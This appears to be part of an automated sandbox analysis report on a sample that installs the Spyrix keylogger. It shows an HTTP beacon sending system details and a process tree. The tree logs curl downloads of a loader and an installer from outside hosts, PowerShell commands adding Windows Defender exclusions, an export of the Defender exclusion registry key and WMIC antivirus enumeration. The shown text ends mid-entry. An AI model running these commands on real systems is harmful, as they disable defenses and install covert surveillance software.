                                                                                                                                                                                                                                                          User-Agent: curl/7.64.0
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Length: 843
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          2024-10-02 04:28:36 UTC843OUTData Raw: 26 74 72 69 61 6c 5f 69 64 3d 2d 31 26 6f 73 5f 69 6e 73 74 61 6c 6c 5f 64 61 74 65 3d 32 30 32 33 2d 31 30 2d 30 33 20 31 30 3a 35 37 3a 31 38 26 6f 73 5f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3d 34 34 20 20 20 20 20 20 20 20 20 20 20 26 64 6e 65 74 3d 34 2e 38 2e 30 34 30 38 34 26 6f 73 5f 63 61 70 74 69 6f 6e 3d 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 31 30 2e 30 2e 31 39 30 34 35 20 26 70 72 67 5f 69 64 3d 53 70 79 72 69 78 20 46 72 65 65 20 4b 65 79 6c 6f 67 67 65 72 26 70 72 67 5f 76 65 72 3d 31 31 2e 36 2e 32 32 26 6c 69 63 65 6e 73 65 3d 26 61 76 3d 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 26 6f 73 5f 74 79 70 65 3d 77 69 6e 64 6f 77 73 26 70 72 67 5f 6c 6e 67 3d 65 6e 67 6c 69 73 68 26 63 6f 6d 70 5f 6e 61
                                                                                                                                                                                                                                                          Data Ascii: &trial_id=-1&os_install_date=2023-10-03 10:57:18&os_country_code=44 &dnet=4.8.04084&os_caption=Microsoft Windows 10 Pro 10.0.19045 &prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&license=&av=Windows Defender&os_type=windows&prg_lng=english&comp_na
                                                                                                                                                                                                                                                          2024-10-02 04:28:37 UTC170INHTTP/1.1 201 Created
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:37 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-10-02 04:28:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                          Start time:00:25:23
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\404.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\404.exe"
                                                                                                                                                                                                                                                          Imagebase:0x130000
                                                                                                                                                                                                                                                          File size:90'112 bytes
                                                                                                                                                                                                                                                          MD5 hash:D15DAEF371B50FB739401BFDE29DF35A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                          Start time:00:25:26
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                          Start time:00:25:26
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                          Start time:00:25:26
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:reg query "HKU\S-1-5-19\Environment"
                                                                                                                                                                                                                                                          Imagebase:0x160000
                                                                                                                                                                                                                                                          File size:59'392 bytes
                                                                                                                                                                                                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                          Start time:00:25:26
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"
                                                                                                                                                                                                                                                          Imagebase:0xc30000
                                                                                                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                          Start time:00:25:37
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
                                                                                                                                                                                                                                                          Imagebase:0x6b0000
                                                                                                                                                                                                                                                          File size:470'528 bytes
                                                                                                                                                                                                                                                          MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                          Start time:00:25:38
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
                                                                                                                                                                                                                                                          Imagebase:0x6b0000
                                                                                                                                                                                                                                                          File size:470'528 bytes
                                                                                                                                                                                                                                                          MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                          Start time:01:56:21
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          File size:33'441'448 bytes
                                                                                                                                                                                                                                                          MD5 hash:0F335D8996D82DA30FE9286C671FA0CD
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                          Start time:01:56:22
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          File size:1'286'144 bytes
                                                                                                                                                                                                                                                          MD5 hash:BFA3F09DEEE00832D000F497EC5B570A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 2%, ReversingLabs
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                          Start time:01:56:25
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                          Start time:01:56:25
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                          Start time:01:56:25
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                          Start time:01:56:25
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
                                                                                                                                                                                                                                                          Imagebase:0x230000
                                                                                                                                                                                                                                                          File size:427'008 bytes
                                                                                                                                                                                                                                                          MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                          Start time:01:56:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                          Start time:01:56:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                          Start time:01:56:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                          Start time:01:56:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
                                                                                                                                                                                                                                                          Imagebase:0x230000
                                                                                                                                                                                                                                                          File size:427'008 bytes
                                                                                                                                                                                                                                                          MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                          Start time:01:56:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd
                                                                                                                                                                                                                                                          Imagebase:0x7ff710960000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                          Start time:01:56:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                          Start time:01:56:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
                                                                                                                                                                                                                                                          Imagebase:0x7ff7a5230000
                                                                                                                                                                                                                                                          File size:77'312 bytes
                                                                                                                                                                                                                                                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                          Start time:01:56:30
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\pswd.cmd
                                                                                                                                                                                                                                                          Imagebase:0x7ff710960000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                          Start time:01:56:30
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                                          Start time:01:56:30
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -ExclusionProcess '404.*'
                                                                                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                          Start time:01:56:42
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
                                                                                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                          Start time:01:56:53
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
                                                                                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                                          Start time:01:57:03
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
                                                                                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                          Start time:01:57:13
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
                                                                                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                                          Start time:01:57:24
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
                                                                                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                          Start time:01:57:34
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
                                                                                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                                          Start time:01:57:44
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
                                                                                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                          Start time:01:57:55
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
